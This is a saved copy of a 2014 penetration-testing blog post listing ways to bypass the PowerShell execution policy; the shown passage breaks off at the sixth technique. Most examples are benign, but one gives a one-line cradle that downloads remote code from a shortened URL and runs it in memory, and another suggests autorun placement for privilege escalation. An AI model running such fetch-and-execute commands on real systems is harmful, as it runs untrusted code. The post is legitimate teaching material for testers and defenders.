Skriptentwickung/knowlegbase/PowerShell - Allgemein/15 Ways to Bypass the PowerShell Execution Policy.htm
2024-01-24 16:42:38 +01:00


<!DOCTYPE html>
<html prefix="og: http://ogp.me/ns#" lang="en-US"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>15 Ways to Bypass the PowerShell Execution Policy</title>
<link rel="profile" href="http://gmpg.org/xfn/11">
<link rel="pingback" href="https://blog.netspi.com/xmlrpc.php">
<script src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/jquery.js"></script>
<!-- This site is optimized with the Yoast WordPress SEO plugin v1.7.1 - https://yoast.com/wordpress/plugins/seo/ -->
<link rel="canonical" href="https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/">
<meta property="og:locale" content="en_US">
<meta property="og:type" content="article">
<meta property="og:title" content="15 Ways to Bypass the PowerShell Execution Policy">
<meta property="og:description" content="By default PowerShell is configured to prevent the execution of PowerShell scripts on Windows systems. This can be&nbsp;a hurdle for penetration testers, sysadmins,&nbsp;and developers, but...">
<meta property="og:url" content="https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/">
<meta property="og:site_name" content="NetSPI Blog">
<meta property="article:tag" content="powershell">
<meta property="article:section" content="Assessment Services">
<meta property="article:published_time" content="2014-09-09T16:45:32+00:00">
<meta property="article:modified_time" content="2014-10-30T11:28:10+00:00">
<meta property="og:updated_time" content="2014-10-30T11:28:10+00:00">
<meta property="og:image" content="https://blog.netspi.com/images/2014/SS_15_Bypass_Powershell/Powershell_Bypass_1.png">
<meta property="og:image" content="https://blog.netspi.com/images/2014/SS_15_Bypass_Powershell/Powershell_Bypass_2.png">
<meta property="og:image" content="https://blog.netspi.com/images/2014/SS_15_Bypass_Powershell/Powershell_Bypass_3.png">
<meta property="og:image" content="https://blog.netspi.com/images/2014/SS_15_Bypass_Powershell/Powershell_Bypass_4.png">
<meta property="og:image" content="https://blog.netspi.com/images/2014/SS_15_Bypass_Powershell/Powershell_Bypass_5.png">
<meta property="og:image" content="https://blog.netspi.com/images/2014/SS_15_Bypass_Powershell/Powershell_Bypass_6.png">
<meta property="og:image" content="https://blog.netspi.com/images/2014/SS_15_Bypass_Powershell/Powershell_Bypass_7.png">
<meta property="og:image" content="https://blog.netspi.com/images/2014/SS_15_Bypass_Powershell/Powershell_Bypass_8.png">
<meta property="og:image" content="https://blog.netspi.com/images/2014/SS_15_Bypass_Powershell/Powershell_Bypass_9.png">
<meta property="og:image" content="https://blog.netspi.com/images/2014/SS_15_Bypass_Powershell/Powershell_Bypass_10.png">
<meta property="og:image" content="https://blog.netspi.com/images/2014/SS_15_Bypass_Powershell/Powershell_Bypass_11.png">
<meta property="og:image" content="https://blog.netspi.com/images/2014/SS_15_Bypass_Powershell/Powershell_Bypass_12.png">
<meta property="og:image" content="https://blog.netspi.com/images/2014/SS_15_Bypass_Powershell/Powershell_Bypass_13.png">
<meta property="og:image" content="https://blog.netspi.com/images/2014/SS_15_Bypass_Powershell/Powershell_Bypass_14.png">
<meta property="og:image" content="https://blog.netspi.com/images/2014/SS_15_Bypass_Powershell/Powershell_Bypass_15.png">
<meta property="og:image" content="https://blog.netspi.com/images/2014/SS_15_Bypass_Powershell/Powershell_Bypass_16.png">
<meta property="og:image" content="https://blog.netspi.com/images/2014/SS_15_Bypass_Powershell/Powershell_Bypass_17.png">
<meta property="og:image" content="https://blog.netspi.com/images/2014/SS_15_Bypass_Powershell/Powershell_Bypass_18.png">
<meta name="twitter:card" content="summary">
<meta name="twitter:description" content="By default PowerShell is configured to prevent the execution of PowerShell scripts on Windows systems. This can be&nbsp;a hurdle for penetration testers, sysadmins,&nbsp;and developers, but...">
<meta name="twitter:title" content="15 Ways to Bypass the PowerShell Execution Policy">
<meta name="twitter:domain" content="NetSPI Blog">
<!-- / Yoast WordPress SEO plugin. -->
<link rel="alternate" type="application/rss+xml" title="NetSPI Blog » Feed" href="https://blog.netspi.com/feed/">
<link rel="alternate" type="application/rss+xml" title="NetSPI Blog » Comments Feed" href="https://blog.netspi.com/comments/feed/">
<link rel="alternate" type="application/rss+xml" title="NetSPI Blog » 15 Ways to Bypass the PowerShell Execution Policy Comments Feed" href="https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/feed/">
<link rel="stylesheet" id="crayon-theme-classic-css" href="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/classic.css" type="text/css" media="all">
<link rel="stylesheet" id="crayon-font-droid-sans-mono-css" href="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/droid-sans-mono.css" type="text/css" media="all">
<link rel="stylesheet" id="easy-social-share-buttons-css" href="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/easy-social-share-buttons.css" type="text/css" media="all">
<link rel="stylesheet" id="responsive-lightbox-nivo_lightbox-css-css" href="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/nivo-lightbox.css" type="text/css" media="all">
<link rel="stylesheet" id="responsive-lightbox-nivo_lightbox-css-d-css" href="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/default.css" type="text/css" media="all">
<link rel="stylesheet" id="wp-pagenavi-css" href="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/pagenavi-css.css" type="text/css" media="all">
<link rel="stylesheet" id="netspi-style-css" href="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/style.css" type="text/css" media="all">
<script type="text/javascript" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/jquery_002.js"></script>
<script type="text/javascript" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/jquery-migrate.js"></script>
<script type="text/javascript" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/nivo-lightbox.js"></script>
<script type="text/javascript">
/* <![CDATA[ */
var rllArgs = {"script":"nivo_lightbox","selector":"lightbox","custom_events":""};
/* ]]> */
</script>
<script type="text/javascript" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/script.js"></script>
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://blog.netspi.com/xmlrpc.php?rsd">
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://blog.netspi.com/wp-includes/wlwmanifest.xml">
<meta name="generator" content="WordPress 4.1">
<link rel="shortlink" href="https://blog.netspi.com/?p=1107">
<style type="text/css">
#wpadminbar .quicklinks li#wp-admin-bar-clickystats {
height: 28px
}
#wpadminbar .quicklinks li#wp-admin-bar-clickystats a {
height: 28px;
padding: 0
}
#wpadminbar .quicklinks li#wp-admin-bar-clickystats a img {
padding: 4px 5px;
height: 20px;
width: 99px;
}
</style>
<style type="text/css">.essb_totalcount_item_before, .essb_totalcount_item_after { display: block !important; }.essb_totalcount_item_before .essb_totalcount, .essb_totalcount_item_after .essb_totalcount { border: 0px !important; }.essb_counter_insidebeforename { margin-right: 5px; font-weight: bold; }.essb_fixed { margin: 0; }.essb_links { text-align: right;}.essb_more_popup { z-index: 999; }.essb_more_popup_content { padding-top: 10px; padding-bottom: 10px; padding-left: 5px; padding-right: 5px; margin: 0; text-align: center; }.essb_more_popup_shadow { position:fixed; _position:absolute; /* hack for IE 6*/ height:100%; width:100%; top:0; left:0; background: rgba(99, 99, 99, 0.3); z-index:998; display: none; }.essb_more_popup_button_close { position: absolute; top:5px; right: 0;}.essb_more_popup_button_close a, .essb_more_popup_button_close a:hover { background: none; background-color: none; border: none; font-weight: bold; text-decoration: none; color: #333; padding-right: 5px; margin-top: 5px;}</style> <style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style>
<link href="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/bootstrap.css" type="text/css" rel="stylesheet">
<link href="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/main.css" type="text/css" rel="stylesheet">
<link href="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/updates.css" type="text/css" rel="stylesheet">
<link href="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/css.css" type="text/css" rel="stylesheet">
<script src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/site.js" type="text/javascript"></script>
</head>
<body class="single single-post postid-1107 single-format-standard group-blog">
<script type="text/javascript">
var WRInitTime = (new Date()).getTime();
</script>
<div id="page" class="section-127 page-127 services blog">
<div id="wrapper">
<div id="body-container" class="site-content">
<div id="body-container" class="content-area">
<main id="main" class="body-content box-row bg-timberwolf" role="main">
<div class="container">
<div class="row">
<div class="post-detail pull-left span8" style="padding: 10px;">
<article id="post-1107" class="post-1107 post type-post status-publish format-standard hentry category-assessment-services tag-powershell">
<h2 class="post-title">15 Ways to Bypass the PowerShell Execution Policy</h2> <div class="post-header">
<div class="entry-meta">
<div style="margin: auto">
<span class="byline"> <span class="author vcard"><a class="url fn n" href="https://blog.netspi.com/author/scott-sutherland/">Scott Sutherland</a></span></span> | <span class="posted-on"><time class="entry-date published" datetime="2014-09-09T16:45:32+00:00">September 9, 2014</time><time class="updated" datetime="2014-10-30T11:28:10+00:00">October 30, 2014</time></span> </div>
<div class="space-box"></div>
</div>
</div>
<div class="entry-content">
<p> By default PowerShell is configured to prevent the execution of
PowerShell scripts on Windows systems. This can be&nbsp;a hurdle for
penetration testers, sysadmins,&nbsp;and developers, but it doesn't have
to be. In this blog I'll cover 15 ways to bypass the&nbsp;PowerShell
execution policy without having local administrator rights on the
system. I'm sure there are many techniques that I've missed (or simply
don't know about), but hopefully this cheat sheet will&nbsp;offer
a&nbsp;good start for those who need it. </p>
<h3> What is the PowerShell Execution Policy? </h3>
<p> The PowerShell execution policy is the setting that determines which
types of PowerShell scripts (if any) can be run on the system. By
default it is set to “<a target="_blank" rel="noopener noreferrer" href="http://technet.microsoft.com/en-us/library/ee176961.aspx">Restricted</a>”,
which basically means none. However, it's important to understand that
the setting was never meant to be a security control. Instead, it was
intended to prevent administrators from shooting themselves in the foot.
That's why there are so many options for working around it,
including a few that Microsoft has provided. Because it is not a security
boundary, it should not be relied on to stop someone who can already run
commands on the system. For more
information on the execution policy settings and other default security
controls in PowerShell I suggest reading <a target="_blank" rel="noopener noreferrer" href="http://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html">Carlos Perez's blog</a>. He provides a nice overview. </p>
<h3>Why Would I Want to Bypass the Execution Policy?</h3>
<p> Automation seems to be one of the more common responses I hear from
people, but below are a few other reasons PowerShell has become so
popular with administrators, pentesters, and
hackers.&nbsp;&nbsp;PowerShell is: </p>
<ul>
<li>Native to Windows</li>
<li>Able to call the Windows API</li>
<li>Able to run commands without writing to the disk</li>
<li>Able to avoid detection by Anti-virus</li>
<li>Already flagged as “trusted” by most application white list solutions</li>
<li>A medium used to write many open source Pentest toolkits </li>
</ul>
<h3>How to View the Execution Policy</h3>
<p> Before being able to use all of the wonderful features PowerShell
has to offer, attackers may have to bypass the “Restricted” execution
policy.&nbsp; You can take a look at the current configuration with the
“Get-ExecutionPolicy” PowerShell command. If you're looking at&nbsp;the
setting for the first time it's likely set to “Restricted” as shown
below. </p>
<p> </p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939b27198635982" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939b27198635982-1">1</div><div class="crayon-num" data-line="crayon-54d381c939b27198635982-2">2</div><div class="crayon-num" data-line="crayon-54d381c939b27198635982-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939b27198635982-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939b27198635982-2"><span class="crayon-i">PS</span><span class="crayon-h"> </span><span class="crayon-v">C</span><span class="crayon-o">:</span><span class="crayon-o">&gt;</span><span class="crayon-h"> </span><span class="crayon-v">Get</span><span class="crayon-o">-</span><span class="crayon-i">ExecutionPolicy</span></div><div class="crayon-line" id="crayon-54d381c939b27198635982-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0004 seconds] -->
<p>
</p><p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_1.png"> </p>
<p> It's also worth noting that the execution policy can be set at
different levels on the system.&nbsp;&nbsp; To view a list of them use
the command below.&nbsp; For more information you can check out
Microsoft's “Set-ExecutionPolicy” page <a href="http://technet.microsoft.com/en-us/library/hh849812.aspx">here</a>.&nbsp; </p>
<p> </p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939b35564975663" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939b35564975663-1">1</div><div class="crayon-num" data-line="crayon-54d381c939b35564975663-2">2</div><div class="crayon-num" data-line="crayon-54d381c939b35564975663-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939b35564975663-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939b35564975663-2"><span class="crayon-v">Get</span><span class="crayon-o">-</span><span class="crayon-v">ExecutionPolicy</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-v">List</span><span class="crayon-h"> </span><span class="crayon-o">|</span><span class="crayon-h"> </span><span class="crayon-v">Format</span><span class="crayon-o">-</span><span class="crayon-v">Table</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">AutoSize</span></div><div class="crayon-line" id="crayon-54d381c939b35564975663-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0005 seconds] -->
<p>
</p><p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_2.png"> </p>
<h3> Lab Setup Notes </h3>
<p> In the examples below I will use a script named runme.ps1 that
contains the following PowerShell command to write a message to the
console: </p>
<p> </p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939b3a014702052" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939b3a014702052-1">1</div><div class="crayon-num" data-line="crayon-54d381c939b3a014702052-2">2</div><div class="crayon-num" data-line="crayon-54d381c939b3a014702052-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939b3a014702052-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939b3a014702052-2"><span class="crayon-v">Write</span><span class="crayon-o">-</span><span class="crayon-i">Host</span><span class="crayon-h"> </span><span class="crayon-s">"My voice is my passport, verify me."</span></div><div class="crayon-line" id="crayon-54d381c939b3a014702052-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0003 seconds] -->
<p>
</p><p> When I attempt to execute it on a system configured with the default execution policy I get the following error: <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_3.png"> </p>
<p> If your current policy is too open and you want to make it more
restrictive to test the techniques below, then run the command
“Set-ExecutionPolicy Restricted” from an administrator PowerShell
console. OK, enough of my babbling; below are 15 ways to bypass the
PowerShell execution policy restrictions. </p>
<h3> Bypassing the PowerShell Execution Policy </h3>
<ol>
<li>
<h4>Paste the Script into an Interactive PowerShell Console</h4>
<p> Copy and paste your PowerShell script into an interactive
console as shown below. However, keep in mind that you will be limited
by your current user's privileges. This is the most basic example and
can be handy for running quick scripts when you have an interactive
console. Also, this technique does not result in a configuration change
or require writing to disk.</p>
<p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_4.png"></p></li>
<li>
<h4>Echo the Script and Pipe it to PowerShell Standard In</h4>
<p> Simply ECHO your script into PowerShell standard input. This
technique does not result in a configuration change or require writing
to disk.</p>
<p> </p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939b40529140660" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939b40529140660-1">1</div><div class="crayon-num" data-line="crayon-54d381c939b40529140660-2">2</div><div class="crayon-num" data-line="crayon-54d381c939b40529140660-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939b40529140660-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939b40529140660-2"><span class="crayon-e">Echo </span><span class="crayon-v">Write</span><span class="crayon-o">-</span><span class="crayon-i">Host</span><span class="crayon-h"> </span><span class="crayon-s">"My voice is my passport, verify me."</span><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">|</span><span class="crayon-h"> </span><span class="crayon-v">PowerShell</span><span class="crayon-sy">.</span><span class="crayon-v">exe</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-v">noprofile</span><span class="crayon-h"> </span><span class="crayon-o">-</span></div><div class="crayon-line" id="crayon-54d381c939b40529140660-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0006 seconds] -->
<p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_5.png"></p></li>
<li>
<h4>Read Script from a File and Pipe to PowerShell Standard In</h4>
<p> Use the Windows “type” command or PowerShell “Get-Content”
command to read your script from the disk and pipe it into PowerShell
standard input. This technique does not result in a configuration
change, but does require writing your script to disk. However, you
could read it from a network share if you're trying to avoid writing to
the disk.</p>
<p> <em>Example 1: Get-Content PowerShell command</em></p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939b45600922147" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939b45600922147-1">1</div><div class="crayon-num" data-line="crayon-54d381c939b45600922147-2">2</div><div class="crayon-num" data-line="crayon-54d381c939b45600922147-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939b45600922147-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939b45600922147-2"><span class="crayon-v">Get</span><span class="crayon-o">-</span><span class="crayon-i">Content</span><span class="crayon-h"> </span><span class="crayon-sy">.</span><span class="crayon-v">runme</span><span class="crayon-sy">.</span><span class="crayon-v">ps1</span><span class="crayon-h"> </span><span class="crayon-o">|</span><span class="crayon-h"> </span><span class="crayon-v">PowerShell</span><span class="crayon-sy">.</span><span class="crayon-v">exe</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-v">noprofile</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-h"> </span></div><div class="crayon-line" id="crayon-54d381c939b45600922147-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0006 seconds] -->
<p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_6.png"></p>
<p> <em>Example 2: Type command</em></p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939b4a112289773" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939b4a112289773-1">1</div><div class="crayon-num" data-line="crayon-54d381c939b4a112289773-2">2</div><div class="crayon-num" data-line="crayon-54d381c939b4a112289773-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939b4a112289773-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939b4a112289773-2"><span class="crayon-i">TYPE</span><span class="crayon-h"> </span><span class="crayon-sy">.</span><span class="crayon-v">runme</span><span class="crayon-sy">.</span><span class="crayon-v">ps1</span><span class="crayon-h"> </span><span class="crayon-o">|</span><span class="crayon-h"> </span><span class="crayon-v">PowerShell</span><span class="crayon-sy">.</span><span class="crayon-v">exe</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-v">noprofile</span><span class="crayon-h"> </span><span class="crayon-o">-</span></div><div class="crayon-line" id="crayon-54d381c939b4a112289773-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0006 seconds] -->
<p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_7.png"></p></li>
<li>
<h4>Download Script from URL and Execute with Invoke Expression</h4>
<p> This technique can be used to download a PowerShell script from
the internet and execute it without having to write to disk. It also
doesn't result in any configuration changes. I have seen it used in
many creative ways, but most recently saw it being referenced in a nice
PowerSploit blog by Matt Graeber. Since nothing touches the disk, file
scanning won't see it; command-line and PowerShell script block logging
are where this kind of execution shows up.</p>
<p> </p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939b72184644566" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939b72184644566-1">1</div><div class="crayon-num" data-line="crayon-54d381c939b72184644566-2">2</div><div class="crayon-num" data-line="crayon-54d381c939b72184644566-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939b72184644566-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939b72184644566-2"><span class="crayon-v">powershell</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-v">nop</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">c</span><span class="crayon-h"> </span><span class="crayon-s">"iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"</span></div><div class="crayon-line" id="crayon-54d381c939b72184644566-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0004 seconds] -->
<p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_8.png"></p></li>
<li>
<h4>Use the Command Switch</h4>
<p> This technique is very similar to executing a script via copy
and paste, but it can be done without the interactive console. It's
nice for simple script execution, but more complex scripts usually end
up with parsing errors. This technique does not result in a
configuration change or require writing to disk.</p>
<p> <em>Example 1: Full command</em></p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939b77851534058" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939b77851534058-1">1</div><div class="crayon-num" data-line="crayon-54d381c939b77851534058-2">2</div><div class="crayon-num" data-line="crayon-54d381c939b77851534058-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939b77851534058-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939b77851534058-2"><span class="crayon-v">Powershell</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">command</span><span class="crayon-h"> </span><span class="crayon-s">"Write-Host 'My voice is my passport, verify me.'"</span></div><div class="crayon-line" id="crayon-54d381c939b77851534058-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0003 seconds] -->
<p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_9.png"></p>
<p> <em>Example 2: Short command</em></p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939b7c333377731" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939b7c333377731-1">1</div><div class="crayon-num" data-line="crayon-54d381c939b7c333377731-2">2</div><div class="crayon-num" data-line="crayon-54d381c939b7c333377731-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939b7c333377731-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939b7c333377731-2"><span class="crayon-v">Powershell</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">c</span><span class="crayon-h"> </span><span class="crayon-s">"Write-Host 'My voice is my passport, verify me.'"</span></div><div class="crayon-line" id="crayon-54d381c939b7c333377731-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0003 seconds] -->
<p> It may also be worth noting that you can place these types of
PowerShell commands into batch files and place them into autorun
locations (like the all users startup folder) to help during privilege
escalation.</p></li>
<li>
<h4>Use the EncodedCommand Switch</h4>
<p> This is very similar to the “Command” switch, but all scripts
are provided as a Unicode/base64 encoded string. Encoding your script
in this way helps to avoid all those nasty parsing errors that you run
into when using the “Command” switch. This technique does not result in
a configuration change or require writing to disk. The sample below
was taken from Posh-SecMod. The same toolkit includes a nice little
